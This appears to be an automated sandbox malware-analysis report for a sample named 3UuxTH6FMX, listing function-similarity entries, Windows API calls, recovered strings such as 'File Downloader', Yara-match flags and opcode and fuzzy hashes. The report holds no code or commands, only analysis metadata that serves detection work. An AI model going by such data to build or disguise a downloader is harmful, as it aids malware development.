                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                  • API String ID: 909987262-435359029
                                                                                                                                                                  • Opcode ID: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
                                                                                                                                                                  • Instruction ID: 553241b660dd3a18a5eaef6e653fd5a82b0405964c6b596cd6d72201dd08f612
                                                                                                                                                                  • Opcode Fuzzy Hash: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
                                                                                                                                                                  • Instruction Fuzzy Hash: 79411921A0DA49D6FA16EB18E1622B9B3B1EF41780FE64172D79D421F1DF2CE583C750
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: 0$0$0
                                                                                                                                                                  • API String ID: 3215553584-3137946472
                                                                                                                                                                  • Opcode ID: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
                                                                                                                                                                  • Instruction ID: b1d2fc41fe250b84fa3a4ff69b874bf100fa705fa694de3d55361af1b375f884
                                                                                                                                                                  • Opcode Fuzzy Hash: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
                                                                                                                                                                  • Instruction Fuzzy Hash: B4E1E63610E6858AFB609F2C94D83ED3B95D7727CCF588412D7A4C7786CE398E598B02
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                  • API String ID: 164343898-1062449267
                                                                                                                                                                  • Opcode ID: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
                                                                                                                                                                  • Instruction ID: a9f250f0f360dc86b74e28a4877c39253bb0b319aceafd5239bcede0fdcf779f
                                                                                                                                                                  • Opcode Fuzzy Hash: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
                                                                                                                                                                  • Instruction Fuzzy Hash: F2718122B06B41EAFB16EF60E4502ACB3B5AF44748F964079DE4C57A66DE3CD412C364
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                  • API String ID: 164343898-1062449267
                                                                                                                                                                  • Opcode ID: 5f2ed07e5030618b00f6371355abd5c80eec764d8848247fda5f00fccaeaef9a
                                                                                                                                                                  • Instruction ID: 9496fb9c36a62849c2f6776c93d555215848d141be81bf413180dc41a5f8fc3e
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f2ed07e5030618b00f6371355abd5c80eec764d8848247fda5f00fccaeaef9a
                                                                                                                                                                  • Instruction Fuzzy Hash: B6717B32709B808AFB19DFB0D4943ED33A6EBA470CF054529DE48A7B99DF348A65D344
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                                                                                                                                                                  • API String ID: 909987262-180087107
                                                                                                                                                                  • Opcode ID: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
                                                                                                                                                                  • Instruction ID: a21f1be5aba711fcc0e0b47ae1278ffac3b229b34c516f7d596550ca60f9edb7
                                                                                                                                                                  • Opcode Fuzzy Hash: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
                                                                                                                                                                  • Instruction Fuzzy Hash: 79510222A0D486D5FA16AB29F0505BCB771FB41B44FE90172E2AE461F1CF2CE583C714
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                  • Opcode ID: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
                                                                                                                                                                  • Instruction ID: 5dfe9399bd56bff39bb526d870ad71423619f2c4ff5cab2c746b0366659f2018
                                                                                                                                                                  • Opcode Fuzzy Hash: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
                                                                                                                                                                  • Instruction Fuzzy Hash: A141F631319A1082FB1ACB1698D87DD2395F765BE8F498925DE69C7784EE38CE458700
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7AA1245C0,?,?,?,?,00007FF7AA133C82), ref: 00007FF7AA124034
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7AA1245C0,?,?,?,?,00007FF7AA133C82), ref: 00007FF7AA124040
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                  • Opcode ID: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
                                                                                                                                                                  • Instruction ID: 414b8f41b01c43760f3a400014b0c402fb4e6ccadb434505382123400bba5c81
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
                                                                                                                                                                  • Instruction Fuzzy Hash: 0841D225B1BA02E1FB57AB16F840575A2B1BF44BD0F8A4175ED0D4B7A4EE3CE44B8320
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseFileHandleOpenRead
                                                                                                                                                                  • String ID: File Downloader
                                                                                                                                                                  • API String ID: 4038090926-3631955488
                                                                                                                                                                  • Opcode ID: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
                                                                                                                                                                  • Instruction ID: e65bd044b3df3db31655d95ee609d54fdcee1bdd878e3c64b17d83849e9db67e
                                                                                                                                                                  • Opcode Fuzzy Hash: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C315032618B9486F7208F15E8A87DEB760FB99FC8F545015EE8983B58DF78C695CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                  • Opcode ID: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
                                                                                                                                                                  • Instruction ID: 4988ac6b3d30b016059709ca00c19bf2e7b6eb2515f8c7b1ff84924f9a1fb321
                                                                                                                                                                  • Opcode Fuzzy Hash: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
                                                                                                                                                                  • Instruction Fuzzy Hash: 99129F7770C24186FB209B15D49C7EE7BA5F3A0758F8C4916E6A2866C4DF39CEA08F11
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 802919b416e315a510088a5e784666147f24c995793ab401ebac47fa396b2d7a
                                                                                                                                                                  • Instruction ID: fda1443da3fbcc2b3636d7c81bb559387ae5c693b93920517caccc93b4470038
                                                                                                                                                                  • Opcode Fuzzy Hash: 802919b416e315a510088a5e784666147f24c995793ab401ebac47fa396b2d7a
                                                                                                                                                                  • Instruction Fuzzy Hash: DC215E3020DA0142FB54677166ED3FD63529B647F8F144F249936C6AD6DE28CE428B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                  • Opcode ID: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
                                                                                                                                                                  • Instruction ID: e1eab6bb5945bc13aebc240443082bb8e4cbf480cf2d5f53c725eeb6b3c629d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A119431318B5086F7508F56E8A879DB7A4F7A8FE8F044214EA5DC7B94CF78CA948740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2984826149-0
                                                                                                                                                                  • Opcode ID: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
                                                                                                                                                                  • Instruction ID: d070d7a3255ba1a677aa7668d39ea3335dc489ad889169308001cbebfaabc7ac
                                                                                                                                                                  • Opcode Fuzzy Hash: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
                                                                                                                                                                  • Instruction Fuzzy Hash: A8A1B9722087A086FB21CF3594A87ED6792FB60B9CF544621DA58C77E5DF38CA868300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                  • Opcode ID: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
                                                                                                                                                                  • Instruction ID: 022ecad1d6c723e59dbbc0051146cd1a550d6a5ddfc62d1e3e9d84c2a9d67d07
                                                                                                                                                                  • Opcode Fuzzy Hash: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D81A47221879086EB24CF25D4987DD73E6FB64BACF540621EA59C7BE5DF38C6828700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
                                                                                                                                                                  • Instruction ID: d8b6b1f2863c0617f0558940f96998d81316b4d58a99af6d0fd3edd43809ef1c
                                                                                                                                                                  • Opcode Fuzzy Hash: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 8451467610D684C5EB629F28D0E43ED37F5D765B8CF588812C79887386DE2D8E49CB12
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00000218BFBE8383
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000218BFBE40D5,?,?,?,?,00000218BFBEB584), ref: 00000218BFBE83B9
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000218BFBE40D5,?,?,?,?,00000218BFBEB584), ref: 00000218BFBE83E6
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000218BFBE40D5,?,?,?,?,00000218BFBEB584), ref: 00000218BFBE83F7
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,00000218BFBE40D5,?,?,?,?,00000218BFBEB584), ref: 00000218BFBE8408
                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00000218BFBE8423
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 4dcc4907368f82da2d4f10a22dd2af241d0de324094643a8daeb9968e7d3aa20
                                                                                                                                                                  • Instruction ID: 41c55e58e0f1ade94fcd8c77c622a3a0817f56f2a76553b2ee2ad7df55886964
                                                                                                                                                                  • Opcode Fuzzy Hash: 4dcc4907368f82da2d4f10a22dd2af241d0de324094643a8daeb9968e7d3aa20
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A113D3030D65046FB54A72566E93FD63929B747BCF184B24A936C6AD6DF28DE428B00
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120B83
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120BB9
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120BE6
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120BF7
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120C08
                                                                                                                                                                  • SetLastError.KERNEL32(?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000,00007FF7AA12BF97,?,?,?), ref: 00007FF7AA120C23
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
                                                                                                                                                                  • Instruction ID: 33100960857177718d512fd3e381278afe27d9526d82d78def7a3a3416deadde
                                                                                                                                                                  • Opcode Fuzzy Hash: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
                                                                                                                                                                  • Instruction Fuzzy Hash: 70116224B0B642D2FAA67771FA91139E1715F847B4F8207B4D82D066F6ED2CF84B8720
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy$ApisFile__std_fs_code_page
                                                                                                                                                                  • String ID: ", "$: "
                                                                                                                                                                  • API String ID: 741338541-747220369
                                                                                                                                                                  • Opcode ID: 22ddfa475eeae45de1cd7e365975f51a2e41ab9aa1c1d35f7e58a2736b3e4656
                                                                                                                                                                  • Instruction ID: 08abdaea88f872abfecdf8e0ef7fe429c91b827d8b1797c7a759125601ed5455
                                                                                                                                                                  • Opcode Fuzzy Hash: 22ddfa475eeae45de1cd7e365975f51a2e41ab9aa1c1d35f7e58a2736b3e4656
                                                                                                                                                                  • Instruction Fuzzy Hash: 85B1AE72709B4096EB00DF65E4983EC27A1E768BCCF508521EE5D97B9ADF34CA95C380
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                  • API String ID: 3237623162-3993994484
                                                                                                                                                                  • Opcode ID: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
                                                                                                                                                                  • Instruction ID: b23c2dd31baee8ff2612c1512caa8f749a3e7f939c734e019a07e310127dcc49
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
                                                                                                                                                                  • Instruction Fuzzy Hash: E51103A2C092479FFA5B7670D45A1F9A760EF61311FD30DB8E268058B3BD5D35074760
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                  • API String ID: 3237623162-3993994484
                                                                                                                                                                  • Opcode ID: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
                                                                                                                                                                  • Instruction ID: e183ccab78eaf4a6c87e1c24bf27a610bcc06b61179335d17110d092d41865a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9501C3A2C092479FFA4B7670D45A1FAA761EF61601FD30DB8E25805CB3AD1D35074760
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
